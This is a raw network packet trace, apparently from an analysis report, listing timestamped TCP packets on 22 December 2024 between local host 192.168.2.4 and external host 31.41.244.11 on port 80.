                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:30.999974966 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.000024080 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.000641108 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.000655890 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.000689983 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.000698090 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.000714064 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.000726938 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.000730991 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.000761986 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.000768900 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.000797987 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.000803947 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.000845909 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.000852108 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.000897884 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.001532078 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.001569033 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.001581907 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.001605988 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.001612902 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.001641989 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.001651049 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.001677990 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.001679897 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.002408028 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.002444029 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.002454996 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.002480984 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.002516985 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.002526045 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.002552032 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.002561092 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.002589941 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.002633095 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.003226042 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.003262043 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.003297091 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.003309011 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.003334999 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.003350019 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.003386021 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.003427029 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.004026890 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.004080057 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.004112959 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.004127026 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.004152060 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.004157066 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.004185915 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.004220963 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.004228115 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.004407883 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.004950047 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.004986048 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.005021095 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.005032063 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.005058050 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.005064011 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.005093098 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.005126953 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.005795002 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.005831003 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.005866051 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.005880117 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.005902052 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.005909920 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.005991936 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.006030083 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.006036997 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.006628036 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.006664038 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.006678104 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.006700039 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.006705999 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.006736040 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.006771088 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.006778955 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.006805897 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.006844044 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.007509947 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.007548094 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.007560015 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.007581949 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.007584095 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.007617950 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.007626057 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.007653952 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.007662058 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.007761955 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.008368015 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.008404970 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.008440018 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.008457899 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.008476019 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.008486032 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.008511066 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.008547068 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.008563042 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.008965969 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.009216070 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.009253025 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.009289026 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.009310961 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.009325027 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.009335041 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.009360075 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.009362936 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.009403944 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.010113001 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.010149002 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.010175943 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.010185003 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.010191917 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.010220051 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.010221958 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.010253906 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.010253906 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.010288954 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.010339975 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.010925055 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.010962009 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.010971069 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.010998011 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.011003971 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.011034966 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.011058092 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.011070967 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.011080980 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.011131048 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.011719942 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.011776924 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.011811972 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.011820078 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.011848927 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.011883020 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.011893034 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.011919022 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.011924028 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.012031078 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.012646914 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.012681007 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.012684107 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.012720108 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.012721062 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.012757063 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.012763023 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.012793064 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.012797117 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.012836933 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.013398886 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.013434887 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.013442039 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.013474941 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.013489962 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.013525963 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.013530016 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.013562918 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.013566971 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.013598919 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.013602972 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.013641119 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.014261961 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.014303923 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.014322996 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.014359951 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.014394999 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.014403105 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.014431000 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.014465094 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.014476061 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.014509916 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.015206099 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.015242100 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.015265942 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.015276909 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.015285015 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.015319109 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.015330076 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.015366077 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.015377045 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.015408993 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.016064882 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.016100883 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.016124010 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.016138077 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.016143084 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.016175032 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.016184092 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.016208887 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.016220093 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.016247034 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.016273022 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.016285896 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.118853092 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.118906975 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.119071007 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.119095087 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.119122982 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.119215012 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.120100975 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.120345116 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.120412111 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.120414019 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.120450974 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.121583939 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.121638060 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.121643066 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.121680975 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.122488022 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.122543097 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.122580051 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.122627974 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.123542070 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.123589039 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.123658895 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.123703957 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.124695063 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.124859095 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.124912977 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.125771046 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.125963926 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.126013994 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.126888990 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.126940966 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.127007008 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.127991915 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.128042936 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.128110886 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.129067898 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.129137993 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.129142046 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.129190922 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.130033970 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.130146980 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.130198956 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.131037951 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.131117105 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.131175041 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.131978035 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.132085085 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.132138968 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.132905006 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.133049965 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.133102894 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.133863926 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.133953094 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.134010077 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.134776115 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.134830952 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.134888887 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.135632038 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.135775089 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.135832071 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.136497021 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.136581898 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.136640072 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.137370110 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.137485027 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.137540102 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.138250113 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.138367891 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.138428926 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.139132023 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.139239073 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.139301062 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.139967918 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.140151978 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.140217066 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.140847921 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.140959024 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:31.141036987 CET4980480192.168.2.431.41.244.11
